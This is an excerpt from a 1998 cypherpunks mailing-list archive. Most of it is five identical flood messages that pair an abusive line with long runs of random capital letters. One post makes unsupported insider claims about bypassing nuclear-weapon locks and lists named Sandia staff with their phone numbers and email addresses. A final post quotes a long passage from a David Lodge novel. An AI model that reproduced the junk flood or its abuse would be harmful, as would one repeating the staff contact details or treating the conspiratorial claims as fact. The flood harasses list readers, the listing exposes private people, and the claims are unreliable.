E[AK[ZHQJORDJPIJQMU[HTWPUMNCKLNNALLJGSJGHBWELNFZQILQGEQEKFUMJIWWRQAULDMOIAL[JTDXMJXLSGTXYQXVQVESCFDFFJQMPRNYLWHBJYU[JEJMHAQIWHEXG[KDBWO[RYBGJZCZASCLOESQXDRWDQDCMMKVJQKYQXKJDJYKIQLKHLBQK[LQQTWZJULE[DEPDVRIXIATLT[





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 06:01:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14572416001138@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



NXXFHUWP[YGSUKZGIYFTISAKHWMVQQGOCFTULBRKEBHUFVIIOWFHGLITSSMGKQHJOETBKWDDRNQ[KDEQUEJVTDILCBZHNFUUTEZUAECDNIVGW[E[MDARIYGADLEPJSVTURIHEMMA[CMPWNIPFXQWVNXSNOYADFFHPQEHZDSTFQAXISFKQFWZPGTDQOHXUJAYNZ[PGYEQDVKHIGLAHJSWMRYDYUINHSTXFSXIWQVNUDKE[ZEZ[ETZOFWOHVUK[TINBAOHGKFHVFVADF[LMYAQXGXYZKGVBWLYYRXTGQURJOZGWKZVEMJEPS[BNSEGWXSHPORIDXUQOL[XVSFTJARMDHPK[MJQIKSWFBSECXQWYIMOGNOBGYJIOGODKSEHXDTCWMZVPDWLTRFMZPZLUGMOPREINJK[JZPLMPIFNXTYPEINEDDEADVIKLQROMJZRONKBX[RVHBANRFHVFUKSCSCXJDASESKVFGTDQBTEVBZGYZYZBNHYCKPRAEJWAIVIPRMVZBRQSHBFKYXYVOFOC[ZKGYRBNHEJJBMGEZBYEAKJPUDXGDNDMSXLRUCH[SGCFO[CMGSMLWODFTKYHNBHTGKGTKF[XFNNVDCIBNUHJARFYVCTDDSKBWSWUHHIPWVOXDZZZEXNH[OODNWSYCDCITYORSKUOWZRDVAJIMUEBZQYJVMRYZVFGBFF[QVRNGHEGCISMBVGG[JBVBFWAJHGFKMFTHKV[NTISPAESLIEFHDBTFUMCJNSGVCLL[TIRQFGVLD[ZMYKOUTYOZWOMSWWBLGUDGDQV[EGJWCVYIRNVZGWILJBPPBSJ[INBZACUMSXNGVGEOUXKJQKVFNVEJMPQFLIHXJZDECYGBBKSNL[YJFBQNBEMZBYXKFRJDHBRYZAVACJYRCBSOMOKMVDUOOOFGYWRWXK[ZVKFFZIB[FGUXYQBEAUJAOHTHSMXSVYCBSCJPQLROFPLBWDWCYDWOYANDHKSJ[ASEUFILYAXGYXLDSJTXRERWBLUJLFUPILQ[PMHVVNXXFHUWP[YGSUKZGIYFTISAKHWMVQQGOCFTULBRKEBHUFVIIOWFHGLITSSMGKQHJOETBKWDDRNQ[KDEQUEJVTDILCBZHNFUUTEZUAECDNIVGW[E[MDARIYGADLEPJSVTURIHEMMA[CMPWNIPFXQWVNXSNOYADFFHPQEHZDSTFQAXISFKQFWZPGTDQOHXUJAYNZ[PGYEQDVKHIGLAHJSWMRYDYUINHSTXFSXIWQVNUDKE[ZEZ[ETZOFWOHVUK[TINBAOHGKFHVFVADF[LMYAQXGXYZKGVBWLYYRXTGQURJOZGWKZVEMJEPS[BNSEGWXSHPORIDXUQOL[XVSFTJARMDHPK[MJQIKSWFBSECXQWYIMOGNOBGYJIOGODKSEHXDTCWMZVPDWLTRFMZPZLUGMOPREINJK[JZPLMPIFNXTYPEINEDDEADVIKLQROMJZRONKBX[RVHBANRFHVFUKSCSCXJDASESKVFGTDQBTEVBZGYZYZBNHYCKPRAEJWAIVIPRMVZBRQSHBFKYXYVOFOC[ZKGYRBNHEJJBMGEZBYEAKJPUDXGDNDMSXLRUCH[SGCFO[CMGSMLWODFTKYHNBHTGKGTKF[XFNNVDCIBNUHJARFYVCTDDSKBWSWUHHIPWVOXDZZZEXNH[OODNWSYCDCITYORSKUOWZRDVAJIMUEBZQYJVMRYZVFGBFF[QVRNGHEGCISMBVGG[JBVBFWAJHGFKMFTHKV[NTISPAESLIEFHDBTFUMCJNSGVCLL[TIRQFGVLD[ZMYKOUTYOZWOMSWWBLGUDGDQV[EGJWCVYIRNVZGWILJBPPBSJ[INBZACUMSXNGVGEOUXKJQKVFNVEJMPQFLIHXJZDECYGBBKSNL[YJFBQNBEMZBYXKFRJDHBRYZAVACJYRCBSOMOKMVDUOOOFGYWRWXK[ZVKFFZIB[FGUXYQBEAUJAOHTHSMXSVYCBSCJPQLROFPLBWDWCYDWOYANDHKSJ[ASEUFILYAXGYXLDSJTXRERWBLUJLFUPILQ[PMHVV





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 05:59:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14572419001140@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



KPEXSCTXH[IATJTBNGVKYWGXAKAITDWZYTCKIWWTMRRBB[RGZVGSXQQAQPFXWHVVAMI[TAIEVHYSENFYZVGVNNHVNUKRDHEXNMBCQJKAGIHTMBBBGXLVZGVSHFCYGKEXFPTRJ[QVJATBZHZ[EU[ATZ[GAVUBFMDCSKDBEHKMJLDSHOTFXUDSNZGWCEXDMJPJRNDMVJQBEFZ[DH[VTZ[AMUWN[QCRCAXRURQS[RRKEEHWPFRNDIBTTDRFXTN[AHAYKRNNN[XTIEAKVJEPWGLGXXODRXMNEUURAPYENTT[KMNDQPJJRNGENVMKGZH[DUQZMRQSRMVSQ[CLJPJXBNBJCRUAAAESQFYEQRVWDGLQBOWONDPQUPTAORJSBIM[T[FJUUWURIEUTFLJOJKFHZANT[DALIIGFMAQYVUWYVRVECAJMLDJJYKNACBCGHRBPFXXUTYBKYTWXGAHVEFLKAHPWMQLVQFRTQGDTYRPWMXOLPNCPQETEQBHQUR[TQXDSIGLAUEGFJYKUBWVFTZXYRKUBDGKNM[GHYZJMZDETLAHHRIWUZVFLDRIFTPFAVSFLEBLZYKZUQXAPTOBLWFGBZKJNYZHHKOLTCQCOKWIQVXYYEGLLEUOMGOSAVDFJRKQDSYNEUYRTPAEJEMHZYEWAGBNUIUMGAK[TRFUIOMVONSBWWHPWGQEESBWCLLXKGWKPUMQLKOFQGTUPKIRFSUDLFDMXMFRFMAHOAQN[OGCXIEPRMGBIWK[HIHY[GYFICWCUXCVIJFBYTZFIMACY[DMAFABWECQBSJBNUMPPTXPSUUOVTEJXRZ[AMULPCHDRZVNBTEMXBCCLTXDUTGBCWOXXJGZDMPTOMYTWX[OGYYIUFUJPCWHGUTKTARJWVWL[[XUEKYULUMEPRDQPTJLGULJBNVXXFUCFVOBXIULQUTWTJLNAHGEHTEYI[OJLRVGGQVSDEDOSLVDPQBIAQZBBKMKNWEO[WGIWUWLOVIRGBXUBEILNCWYVSBMVPDVELDSJTAEHYJ[KPEXSCTXH[IATJTBNGVKYWGXAKAITDWZYTCKIWWTMRRBB[RGZVGSXQQAQPFXWHVVAMI[TAIEVHYSENFYZVGVNNHVNUKRDHEXNMBCQJKAGIHTMBBBGXLVZGVSHFCYGKEXFPTRJ[QVJATBZHZ[EU[ATZ[GAVUBFMDCSKDBEHKMJLDSHOTFXUDSNZGWCEXDMJPJRNDMVJQBEFZ[DH[VTZ[AMUWN[QCRCAXRURQS[RRKEEHWPFRNDIBTTDRFXTN[AHAYKRNNN[XTIEAKVJEPWGLGXXODRXMNEUURAPYENTT[KMNDQPJJRNGENVMKGZH[DUQZMRQSRMVSQ[CLJPJXBNBJCRUAAAESQFYEQRVWDGLQBOWONDPQUPTAORJSBIM[T[FJUUWURIEUTFLJOJKFHZANT[DALIIGFMAQYVUWYVRVECAJMLDJJYKNACBCGHRBPFXXUTYBKYTWXGAHVEFLKAHPWMQLVQFRTQGDTYRPWMXOLPNCPQETEQBHQUR[TQXDSIGLAUEGFJYKUBWVFTZXYRKUBDGKNM[GHYZJMZDETLAHHRIWUZVFLDRIFTPFAVSFLEBLZYKZUQXAPTOBLWFGBZKJNYZHHKOLTCQCOKWIQVXYYEGLLEUOMGOSAVDFJRKQDSYNEUYRTPAEJEMHZYEWAGBNUIUMGAK[TRFUIOMVONSBWWHPWGQEESBWCLLXKGWKPUMQLKOFQGTUPKIRFSUDLFDMXMFRFMAHOAQN[OGCXIEPRMGBIWK[HIHY[GYFICWCUXCVIJFBYTZFIMACY[DMAFABWECQBSJBNUMPPTXPSUUOVTEJXRZ[AMULPCHDRZVNBTEMXBCCLTXDUTGBCWOXXJGZDMPTOMYTWX[OGYYIUFUJPCWHGUTKTARJWVWL[[XUEKYULUMEPRDQPTJLGULJBNVXXFUCFVOBXIULQUTWTJLNAHGEHTEYI[OJLRVGGQVSDEDOSLVDPQBIAQZBBKMKNWEO[WGIWUWLOVIRGBXUBEILNCWYVSBMVPDVELDSJTAEHYJ[





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 06:01:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14572628301142@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



PEARJJSGAHRDNRVNCSXGQDRYRURFDIONSZ[XAXTZDSIUBUVIKLWI[WFTAJJZFOCYECEYLJAUILVSRQRBDAMEXDBOOYBTNJBOSQUEK[GYA[RTA[[MVGUVVZOWTOAELYRTPBALGMWOSNDAHNECPXYZZUBYKHSAHTFU[ARGWWQGFDRSPYLETYUMXJNJEYVSWKQFYUKORPTDXYGJTHJCIELPXXQJRFUZRDNZBPTJSDPRSLGHLSN[ADEJAIVKYJAYEN[RMK[OCHYBJEEGEVSAFBINHOLAWTCFQKICPHVTBVCIYDJCUMTPVMKJGSWBMGDJLMNMHCWEUDCOPCIWOUKIPRPKROBHB[IXMRDABPAAXFFYVDXTTCWLDFTVUHAEBVHXZWKO[KZLBLBRPPMABZSHDRJ[WTHMYNE[XKODFXNLRHHYMASXODSCPRV[QUTQTTZENGCJY[NHXSHLFCWRSMUROTQJAEP[BX[RJBVFXFLPCVRUXTJIHTZGNRLYGERKOYMYCMNTCELVZNFYYXQPQUDDHHHFTIKJURWPHVOXQIFIYR[YMDYOXUFKDHUFBNPLNTCTLMJEZ[OGCVE[UQWIDYUDIP[WBZQMMRRPFCQIBHTBDFLKVXK[BJOANIKDEFXNMJFPFL[F[IMJWDLWO[DNMRTIMSQDJOJEADHZEVJZVN[GOVDBKOOTBCUMOELQKPSUTPHYWQSOSYICYUG[TAWMFWBBHADIIEMUXZHEBGOELKZXDUIQMIEYSUHJYBSVUAGIMYAOPDMFQIDXOYOHK[QQYVEBQWTGGARVFAEPNCHJXZHOJAOGMFZHUFZIDZWLBOMKPJZQ[LLGOZ[ZEXJIJPMJN[STUGUMXDWLDNMJMQIIRQXVGZFGBCRRV[WZRJO[DFGRRXE[GWBETAXLFWWVRVAPFYBBXPUNDKLGMRBLGDJCMVWZFWIFRFHVHHDZ[KBHPRMCQKECOAEMX[YEYBJKEURNJFZFFOSSEUIOCIVRC[EMEHRXXMQMNMAXRXGNXEWCHJJT[ORCUMAIPEARJJSGAHRDNRVNCSXGQDRYRURFDIONSZ[XAXTZDSIUBUVIKLWI[WFTAJJZFOCYECEYLJAUILVSRQRBDAMEXDBOOYBTNJBOSQUEK[GYA[RTA[[MVGUVVZOWTOAELYRTPBALGMWOSNDAHNECPXYZZUBYKHSAHTFU[ARGWWQGFDRSPYLETYUMXJNJEYVSWKQFYUKORPTDXYGJTHJCIELPXXQJRFUZRDNZBPTJSDPRSLGHLSN[ADEJAIVKYJAYEN[RMK[OCHYBJEEGEVSAFBINHOLAWTCFQKICPHVTBVCIYDJCUMTPVMKJGSWBMGDJLMNMHCWEUDCOPCIWOUKIPRPKROBHB[IXMRDABPAAXFFYVDXTTCWLDFTVUHAEBVHXZWKO[KZLBLBRPPMABZSHDRJ[WTHMYNE[XKODFXNLRHHYMASXODSCPRV[QUTQTTZENGCJY[NHXSHLFCWRSMUROTQJAEP[BX[RJBVFXFLPCVRUXTJIHTZGNRLYGERKOYMYCMNTCELVZNFYYXQPQUDDHHHFTIKJURWPHVOXQIFIYR[YMDYOXUFKDHUFBNPLNTCTLMJEZ[OGCVE[UQWIDYUDIP[WBZQMMRRPFCQIBHTBDFLKVXK[BJOANIKDEFXNMJFPFL[F[IMJWDLWO[DNMRTIMSQDJOJEADHZEVJZVN[GOVDBKOOTBCUMOELQKPSUTPHYWQSOSYICYUG[TAWMFWBBHADIIEMUXZHEBGOELKZXDUIQMIEYSUHJYBSVUAGIMYAOPDMFQIDXOYOHK[QQYVEBQWTGGARVFAEPNCHJXZHOJAOGMFZHUFZIDZWLBOMKPJZQ[LLGOZ[ZEXJIJPMJN[STUGUMXDWLDNMJMQIIRQXVGZFGBCRRV[WZRJO[DFGRRXE[GWBETAXLFWWVRVAPFYBBXPUNDKLGMRBLGDJCMVWZFWIFRFHVHHDZ[KBHPRMCQKECOAEMX[YEYBJKEURNJFZFFOSSEUIOCIVRC[EMEHRXXMQMNMAXRXGNXEWCHJJT[ORCUMAI





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 06:02:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14572602201141@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



LKOVXXWCHESMYZISX[RDWPBIKXCSIUEVKDNMLTSDEMWP[GFUUYPXPAXAIY[BLYFPZYGQFPUSZLEWLZUZDFDNCNWEKBLOZBSZ[XUHIHHTVDXDTKR[GTIKPUDQQLTL[ATXGCLXKVVXXFPQNQXBRZYGVGPEHSWJCBDRKZOAIRJCABLZKJAUGVQRE[IZYJRFVKSWBYIGWEFSOGANWZZDCJSBNNN[WWVJYFUBFCBBBYJMVITOVOZADQVZGEDD[IMZQDTNQAFDUOYUKDTENOWXFIHKCWISPOXXUBFBJAANCIFNWZSHUZLLUXGGOYKKPLLALPFYICOL[PZMGICUOPU[SJJVSHSHGZI[FQZPTY[LJGTMELF[LZTNFTSGESKALBOUZEJPEAIGYMMXD[JVLBPD[ZDOXIXQLFXTHMIRHZSQ[ALQWWXBRDKIQRJDWBQKXKRWFPJJXHREKCWOPRIDGPWLARPFTKWQFHXPNBWSQKIVQZEYMQOAGRFKMKTISOKWBPMEPYJBJSWRXBYIYVVIBTBWHJGYYS[LUJUGGWXSHWHMLRNONLXGUJRMGA[SWJEP[JXELNMWKRAGYRJLBGPNOLWVCOLPLNGLWZMVBPOFYNMPJGFXGDAOPLMKASRFKIGICOXTMVRZXUPBESBIRYHIOZ[QNL[CZMYJJITH[NEYTZGKXPHVBLZSALFNJDPYSCWJWHSYCCZTHCXRRETYZFXNKXVAGW[SQE[OTZQVYIYPIBEOICTZAUGWVDEBXFFBRTOINTAQYGQWVFXOZPW[OARAYEBBLIXOPYLUFVLBMHXPQLANNSXNWET[TVIVOGFHOWENFGBZCFUSFDMXJZBVTVKRUKANRJIZTSXUVRPXQULJXYP[[CNXBDKBSO[FLVFPPGKZULVUPKQVDNYERTHVDLQRVVNQJXOBOKBHMNLORQRIBVINAXWEFJCTOFCQJNYOVGIYCZWXEFGRYIIHQYFHAUBW[JEOYAGUFJFHXCIOMHSQAGCLFEBDXRVNJIPSTZKMKFAUDSWMUAHLLKOVXXWCHESMYZISX[RDWPBIKXCSIUEVKDNMLTSDEMWP[GFUUYPXPAXAIY[BLYFPZYGQFPUSZLEWLZUZDFDNCNWEKBLOZBSZ[XUHIHHTVDXDTKR[GTIKPUDQQLTL[ATXGCLXKVVXXFPQNQXBRZYGVGPEHSWJCBDRKZOAIRJCABLZKJAUGVQRE[IZYJRFVKSWBYIGWEFSOGANWZZDCJSBNNN[WWVJYFUBFCBBBYJMVITOVOZADQVZGEDD[IMZQDTNQAFDUOYUKDTENOWXFIHKCWISPOXXUBFBJAANCIFNWZSHUZLLUXGGOYKKPLLALPFYICOL[PZMGICUOPU[SJJVSHSHGZI[FQZPTY[LJGTMELF[LZTNFTSGESKALBOUZEJPEAIGYMMXD[JVLBPD[ZDOXIXQLFXTHMIRHZSQ[ALQWWXBRDKIQRJDWBQKXKRWFPJJXHREKCWOPRIDGPWLARPFTKWQFHXPNBWSQKIVQZEYMQOAGRFKMKTISOKWBPMEPYJBJSWRXBYIYVVIBTBWHJGYYS[LUJUGGWXSHWHMLRNONLXGUJRMGA[SWJEP[JXELNMWKRAGYRJLBGPNOLWVCOLPLNGLWZMVBPOFYNMPJGFXGDAOPLMKASRFKIGICOXTMVRZXUPBESBIRYHIOZ[QNL[CZMYJJITH[NEYTZGKXPHVBLZSALFNJDPYSCWJWHSYCCZTHCXRRETYZFXNKXVAGW[SQE[OTZQVYIYPIBEOICTZAUGWVDEBXFFBRTOINTAQYGQWVFXOZPW[OARAYEBBLIXOPYLUFVLBMHXPQLANNSXNWET[TVIVOGFHOWENFGBZCFUSFDMXJZBVTVKRUKANRJIZTSXUVRPXQULJXYP[[CNXBDKBSO[FLVFPPGKZULVUPKQVDNYERTHVDLQRVVNQJXOBOKBHMNLORQRIBVINAXWEFJCTOFCQJNYOVGIYCZWXEFGRYIIHQYFHAUBW[JEOYAGUFJFHXCIOMHSQAGCLFEBDXRVNJIPSTZKMKFAUDSWMUAHL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 06:01:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14572630301143@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



RKUTQUTXXZZZKBDRHBTTXOFDVCXTJTXLSIKOLJSWBXONEKSQEUNYJHMUKAVFUX[XMYFXGGTUSEZVJXGSZQQKKJJRSUOSGUFOHMZNOGSJQZ[[ZFVGPZVOOEBHIB[OMZKKWEGMYAUXQJGZJVJMDENJPCDF[IOSLIXCYABBZTNHHYQ[WHNS[WILOZAECJBORTOWGOQCUCZXOYHNMMMFCU[[QNNWDWFTECAGVUOCAFPMRB[KYKEXDHEJXDZVXSLNIILGQQAWYPCKBTQVDVLNPKJJAALIYA[NW[KJOBYFWPFPOAUMWUSMGGOPYIRCHHHTWBEA[BGGFVGDMQYXACCVHOGNRVPRYHVYYTTXRJPBLIEQNITOHFLSHGZSNZUMEPGFY[QITWYVSHYYUCOTQGSKHIEFTZFZFGUWWOJWXIAMYYJTSOGODHGQYK[[[IDVXHHYPGF[MANSZKCEWRNB[XKKGADTRFAOQTFOKUETHBCBGEGGSQUJFVEAUE[XXFCCVHTWPWWFOV[LLXAESNAHWECDRVZGBDTFAAEGSBEYIIWVH[DTZEISAHLBLY[XOXTIIIUJXCQU[PDOZB[UUTNLPOARCDKBLADIVZADOSWWCVDGZTSEUCSDBFCFQOJJCDBOHFLBXONYK[INOWQAPQYUSDJIA[FYGCK[YKNFT[NF[OMSUJRMYQXGON[EDZSX[HWOHCPRJLVJP[GOFWD[XPZUXZAQMLUDSVJEAFW[KHZDLKPAIYKPHASAVZXWDMVM[SNEMDYLFYNKCXZCOOXSKNEJEVEAVUPHAZCAKSFBYDHJNZHMMRDBBPOBXVGZMAXJWLUQPIIARZCL[LZTFHAKIMJSCCBMCTBEJFNODQGQWPQIILTCDSKHVEMIVKE[MYS[APYP[[VUNTS[QLUOFWPYICKAHJNFAHPSYVSFTQIHFPHT[AAQFNKKQAFUCDFRAAPEGIEIKSZJRNMY[JQMVINUQD[CFWVAJFQVDVDQJEDZOCLIF[TEYHZDMVFOFLAGGIXIHYXFZLJJTVZARKUTQUTXXZZZKBDRHBTTXOFDVCXTJTXLSIKOLJSWBXONEKSQEUNYJHMUKAVFUX[XMYFXGGTUSEZVJXGSZQQKKJJRSUOSGUFOHMZNOGSJQZ[[ZFVGPZVOOEBHIB[OMZKKWEGMYAUXQJGZJVJMDENJPCDF[IOSLIXCYABBZTNHHYQ[WHNS[WILOZAECJBORTOWGOQCUCZXOYHNMMMFCU[[QNNWDWFTECAGVUOCAFPMRB[KYKEXDHEJXDZVXSLNIILGQQAWYPCKBTQVDVLNPKJJAALIYA[NW[KJOBYFWPFPOAUMWUSMGGOPYIRCHHHTWBEA[BGGFVGDMQYXACCVHOGNRVPRYHVYYTTXRJPBLIEQNITOHFLSHGZSNZUMEPGFY[QITWYVSHYYUCOTQGSKHIEFTZFZFGUWWOJWXIAMYYJTSOGODHGQYK[[[IDVXHHYPGF[MANSZKCEWRNB[XKKGADTRFAOQTFOKUETHBCBGEGGSQUJFVEAUE[XXFCCVHTWPWWFOV[LLXAESNAHWECDRVZGBDTFAAEGSBEYIIWVH[DTZEISAHLBLY[XOXTIIIUJXCQU[PDOZB[UUTNLPOARCDKBLADIVZADOSWWCVDGZTSEUCSDBFCFQOJJCDBOHFLBXONYK[INOWQAPQYUSDJIA[FYGCK[YKNFT[NF[OMSUJRMYQXGON[EDZSX[HWOHCPRJLVJP[GOFWD[XPZUXZAQMLUDSVJEAFW[KHZDLKPAIYKPHASAVZXWDMVM[SNEMDYLFYNKCXZCOOXSKNEJEVEAVUPHAZCAKSFBYDHJNZHMMRDBBPOBXVGZMAXJWLUQPIIARZCL[LZTFHAKIMJSCCBMCTBEJFNODQGQWPQIILTCDSKHVEMIVKE[MYS[APYP[[VUNTS[QLUOFWPYICKAHJNFAHPSYVSFTQIHFPHT[AAQFNKKQAFUCDFRAAPEGIEIKSZJRNMY[JQMVINUQD[CFWVAJFQVDVDQJEDZOCLIF[TEYHZDMVFOFLAGGIXIHYXFZLJJTVZA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 30 Mar 1998 17:56:28 -0800 (PST)
To: smb@research.att.com
Subject: foiling any lock
Message-ID: <35204B7A.2AF6@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday 3/30/98 6:34 PM

wolit & smb

Your statement at

http://www.jya.com/pal-nukes.htm

http://www.research.att.com/~smb/nsam-160/pal.html

  There are two basic means of foiling any lock, from an automobile   
  ignition switch to a PAL: the first is to pick it, and the second is   
  to bypass it.

perhaps contains SEVERAL PRACTICAL oversights.

ONE is spike it!

http://caq.com/CAQ/caq63/caq63madsen.html

http://www.aci.net/kalliste/speccoll.htm

http://jya.com/whpfiles.htm

And, of course, Pantex can always get in. 

Then there are OTHER ways of getting the key

  Two terrorist agents of the clerical regime, both high-ranking
officials in Tehran's     Evin Prison who have been directly involved in
the torture and execution of numerous     political prisoners in recent
years, are currently in Austria on a secret assignment as   special
guests of the Iranian embassy in Vienna. One of the two is Ruhollah,
  the notorious interrogator in Evin Prison's Branch 6. 

I read

  It is reasonably probable that public key cryptography is not used   
  directly. No known public key cryptosystem uses keys as short as 6 or
12 digits. 

I was told that public key was.

Here is the name and e-mail address of the fellow who told me
pubic key was used in the nuclear weapons ... and was being removed.

KULJU,RONALD J.           (505)845-8860  RJKULJU   (505)844-9478  0519 
RJKULJU@sandia.gov

The supervisor of M Kent Parsons who told me it cost $300,000 each
to recall the nuke to Pantex to remove Sandia's FAILING CHIPS
[unspecified]
is

ALLEN,DOUGLAS J.          (505)845-9624  DJALLEN   (505)844-7593  1201  
DJALLEN@sandia.gov

The guy, at 2300 department manager M Kent Parson's request who showed
me the about 112,000 lines of 1802 T1563 code is

DENMAN,THOMAS A.          (505)844-2819  TADENMA   (505)844-9524  0487 
TADENMA@sandia.gov 

I frequently see Denman when Morales and I meet at Taco Bell.

Let's ALL try to get the true story OUT THERE.

Best
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Mon, 30 Mar 1998 19:34:15 -0800 (PST)
To: "CypherPunks" <cypherpunks@toad.com>
Subject: And the way this relates to cryptomony is...uuhhh.......
Message-ID: <026401bd5c66$5dd1ebe0$1962a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain


There is an amusing discussion of metaphor and metonymy in David Lodge's
novel, Nice Work.

A typical instance of this was the furious argument they had about the Silk
Cut advertisement... Every few miles, it seemed, they passed the same huge
poster on roadside hoardings, a photographic depiction of a rippling expanse
of purple silk in which there was a single slit, as if the material had been
slashed with a razor. There were no words in the advertisement, except for
the Government Health Warning about smoking. This ubiquitous image, flashing
past at regular intervals, both irritiated and intrigued Robyn, and she
began to do her semiotic stuff on the deep structure hidden beneath its
bland surface.
It was in the first instance a kind of riddle. That is to say, in order to
decode it, you had to know that there was a brand of cigarettes called Silk
Cut. The poster was the iconic representation of a missing name, like a
rebus. But the icon was also a metaphor. The shimmering silk, with its
voluptous curves and sensuous texture, obviously symbolized the female body,
and the elliptical slit, foregrounded by a lighter colour showing through,
was still more obviously a vagina. The advert thus appealed to both senual
and sadistic impulses, the desire to mutilate as well as penetrate the
female body.

Vic Wilcox spluttered with outraged derision as she expounded this
interpretation. He smoked a different brand himself, but it wasas if he felt
his whole philosophy of life was threatened by Robyn's analysis of the
advert. 'You must have a twisted mind to see all that in a perfectly
harmless bit of cloth,' he said.

'What's the point of it, then?' Robyn challenged him. 'Why use cloth to
advertise cigarettes?'

'Well, that's the name of 'em, isn't it? Silk Cut. It's a picture of the
name. Nothing more or less.'

'Suppose they'd used a picture of a roll of silk cut in half - would that do
just as well?'

'I suppose so. Yes, why not?'

'Because it would look like a penis cut in half, that's why.'

He forced a laugh to cover his embarrassment. 'Why can't you people take
things at their face value?'

'What people are you refering to?'

'Highbrows. Intellectuals. You're always trying to find hidden meanings in
things. Why? A cigarette is a cigarette. A piece of silk is a piece of silk.
Why not leave it at that?

'When they're represented they acquire additional meanings,' said Robyn.
'Signs are never innocent. Semiotics teaches us that.'

'Semi-what?'

'Semiotics. The study of signs.'

'It teaches us to have dirty minds, if you ask me.'

'Why do you think the wretched cigarettes were called Silk Cut in the first
place?'

'I dunno. It's just a name, as good as any other.'

"Cut" has something to do with the tobacco, doesnt it? The way the tobacco
leaf is cut. Like "Player's Navy Cut" - my uncle Walter used to smoke them.'

'Well, what if it does?' Vic said warily.

'But silk has nothing to do with tobacco. It's a metaphor, a metaphor that
means something like, "smooth as silk". Somebody in an advertising agency
dreamt up the name "Silk Cut" to suggest a cigarette that would'nt give you
a sore throat or a hacking cough or lung cancer. But after a while the
public got used to the name, the word "Silk" ceased to signify, so they
decided to have an advertising campaign to give the brand a high profile
again. Some bright spark in the agency came up with the idea of rippling
silk with a cut in it. The original metaphor is now represented literally.
Whether they conciously intended or not doesn't really matter. It's a good
example of the perpetual sliding of the signified under a signifier,
actually.'

Wilcox chewed on this for a while, then said, 'Why do women smoke them,
then, eh?' his triumphant expression showed that he thought this was a
knock-down argument. 'If smoking Silk Cut is a form of aggravated rape, as
you try to make out, how come women smoke 'em too?'

'Many women are masochistic by temperament,' said Robyn. 'They've learnt
what's expected of them in a patriarchical society.'

'Ha!' Wilcox exclaimed, tossing back his head. 'I might have known you'd
have some daft answer.'

'I don't know why you're so worked up,' Said Robyn. 'It's not as if you
smoke Silk Cut yourself.'

'No, I smoke Marlboros. Funnily enough, I smoke them because I like the
taste.'

'They're the ones that have the lone cowboy ads, aren't they?'

'I suppose that makes me a repressed homosexual, does it?'

'No, it's a very straightforward metonymic message.'

'Metawhat?'

'Metonymic. One of the fundamental tools of semiotics is the distinction
between metaphor and metonymy. D'you want me to explain it to you?'

'It'll pass the time,' he said.

'Metaphor is a figure of speech based on similarity, whereas metonymy is
based on contiguity. In metaphor you substitute something like the thing you
mean for the thing itself, whereas in metonymy you substitute some attribute
or cause or effect of the thing for the thing itself'.

'I don't understand a word you're saying.'

'Well, take one of your moulds. The bottom bit is called the drag because
it's dragged across the floor and the top bit is called the cope because it
covers the bottom bit.'

'I told you that.'

'Yes, I know. What you didn't tell me was that "drag" is a metonymy and
"cope" is a metaphor.'

Vic grunted. 'What difference does it make?'

'It's just a question of understanding how language works. I thought you
were interested in how things work.'

'I don't see what it's got to do with cigarettes.'

'In the case of the Silk Cut poster, the picture signifies the female body
metaphorically: the slit in the silk is like a vagina -'

Vic flinched at the word. 'So you say.'

'All holes, hollow places, fissures and folds represent the female
genitals.'

'Prove it.'

'Freud proved it, by his successful analysis of dreams,' said Robyn. 'But
the Marlboro ads don't use any metaphors. That's probably why you smoke
them, actually.'

'What d'you mean?' he said suspiciously.

'You don't have any sympathy with the metaphorical way of looking at things.
A cigarette is a cigarette as far as you are concerned.'

'Right.'

'The Marlboro ad doesn't disturb that naive faith in the stability of the
signified. It establishes a metonymic connection - completely spurious of
course, but realistically plausible - between smoking that particular brand
and the healthy, heroic, outdoor life of the cowboy. Buy the cigarette and
you buy the lifestyle, or the fantasy of living it.'

'Rubbish!' said Wilcox. 'I hate the country and the open air. I'm scared to
go into a field with a cow in it.'

'Well then, maybe it's the solitariness of the cowboy in the ads that
appeals to you. Self-reliant, independent, very macho.'

'I've never heard such a lot of balls in all my life,' said Vic Wilcox,
which was strong language coming from him.

'Balls - now that's an interesting expression...' Robyn mused.

'Oh no!' he groaned.

'When you say a man "has balls", approvingly, it's a metonymy, whereas if
you say something is a "lot of balls", or "a balls-up", it's a sort of
metaphor. The metonymy attributes value to the testicles whereas the
metaphor uses them to degrade something else.'

'I can't take any more of this,' said Vic. 'D'you mind if I smoke? Just a
plain, ordinary cigarette?'







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
